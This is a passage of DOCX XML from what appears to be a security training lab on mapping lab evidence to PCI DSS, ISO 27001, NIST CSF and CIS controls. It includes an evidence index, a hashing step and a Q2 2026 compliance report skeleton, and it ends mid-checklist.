          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No shell required — produce a single Markdown deliverable.</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Why a crosswalk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Most organisations are subject to multiple frameworks. A crosswalk avoids re-running the same control three times under three names. You demonstrate one technical control once and reference it from each framework.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Pull the framework primary sources (free)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PCI DSS v4.0 — https://www.pcisecuritystandards.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ISO 27001:2022 (overview) — https://www.iso.org/isoiec-27001-information-security.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NIST CSF 2.0 — https://www.nist.gov/cyberframework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CIS Controls v8 — https://www.cisecurity.org/controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>For internal training, the open OWASP, OSSTMM, and CIS Benchmarks are also useful (CySA+ 2.1 names them).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Build the crosswalk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Save as crosswalk.md:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Control crosswalk — Lab evidence ↔ Frameworks</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Control area | Lab evidence | PCI DSS v4 | ISO 27001:2022 | NIST CSF 2.0 | CIS v8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Asset inventory | Lab 11 (Nmap inventory) | 9.5, 12.5 | A.5.9 | ID.AM-1/2 | 1.1 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Vuln scanning | Lab 12 (OpenVAS) | 11.3.1/11.3.2 | A.8.8 | ID.RA-1, PR.IP-12 | 7.1, 7.6 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Web app scan | Lab 13 (ZAP) | 6.4.1 | A.8.29 | PR.IP-7, DE.CM-8 | 16.11 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Patch mgmt | Lab 18 | 6.3.3 | A.8.8 | PR.IP-12 | 7.4 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Hardening | Lab 2, Lab 18 (Lynis) | 2.2 | A.8.9 | PR.IP-1 | 4 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Log ingest + time | Lab 1 | 10.4, 10.6 | A.8.15, A.8.17 | DE.AE-3, PR.PT-1 | 8 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| SIEM correlation | Lab 7 | 10.4, 10.6 | A.8.16 | DE.CM-1/3 | 8.11 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Email security | Lab 8 | 5.4.1 | A.5.34 | PR.DS-2 | 9.7 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Threat intel | Lab 10 | 6.3.1 | A.5.7 | ID.RA-2, ID.RA-3 | 13.1 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Network segmentation | Lab 3 | 1.4, 1.5 | A.8.22 | PR.AC-5 | 12 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Containment / isolation | Lab 24 | 12.10.5 | A.5.26 | RS.MI-1 | 17.5 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Forensics / chain of custody | Lab 21 | 12.10.4 | A.5.28 | RS.AN-1/3 | 17 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| IR plan / tabletop | Lab 25 | 12.10.1, 12.10.2 | A.5.24, A.5.25 | RS.RP-1, RC.RP-1 | 17.4 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Reporting &amp; metrics | Lab 26, 27, 28 | 12.10.7 | A.5.27 | RS.CO-2/3 | 17.6 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Generate compliance evidence files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>For each control area, produce one named evidence file pointing at the underlying lab artefact:</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fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Evidence ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Source artefact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>E-VM-2026Q2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Quarterly vuln scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>report.html from Lab 26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>E-IR-CASE001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Incident report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>incident_report.md from Lab 27</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>E-CoC-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Chain of custody</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>chain_of_custody.md from Lab 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>E-LOG-RET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>12-month log retention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>rsyslog config + sample rotation log (Lab 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>E-HRD-LYN-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hardening scan May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/var/log/lynis.log from Lab 18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>E-CSF-SEG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Segmentation diagram</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lab 3 namespace diagram</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hash every file:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha256sum *.md *.csv *.html &gt; MANIFEST.sha256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Compliance report skeleton</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Compliance Report — Q2 2026</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**Scope:** Cardholder data environment + customer PII systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Frameworks:** PCI DSS v4.0, ISO 27001:2022, NIST CSF 2.0, CIS v8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Reporting period:** 2026-04-01 → 2026-06-30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Author:** SOC Compliance Lead</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Approver:** CISO</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1. Executive summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>All in-scope PCI controls were exercised in this period. Two ISO 27001 controls (A.5.30 ICT readiness, A.7.5 protecting against physical threats) have **observations** — see §5.</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2. Control crosswalk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>See `crosswalk.md`.</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3. Evidence index</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>See `evidence-index.csv`.</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4. Open audit findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Finding | Framework | Risk | Owner | Due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Quarterly scan ran 4 days late in April | PCI 11.3.1 | Low | Platform | 2026-06-30 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| BC/DR tabletop overdue | ISO A.5.30 | Med | CISO office | 2026-07-31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5. Risk acceptances</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Risk | Justification | Sign-off | Review date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Legacy IIS 7.5 on legacy01 | Vendor MOU until 2026-12 | CISO 2026-05-13 | 2026-09 |</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6. Stakeholder distribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CISO, CFO (PCI), Legal (DPA), External auditor (read-only via secure share).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — The auditor's checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Before submission, verify:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[ ] Every control row has an Evidence ID and the evidence file exists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[ ] Every evidence file is hashed and the hash is in MANIFEST.sha256.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[ ] Open findings have an owner and a due date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
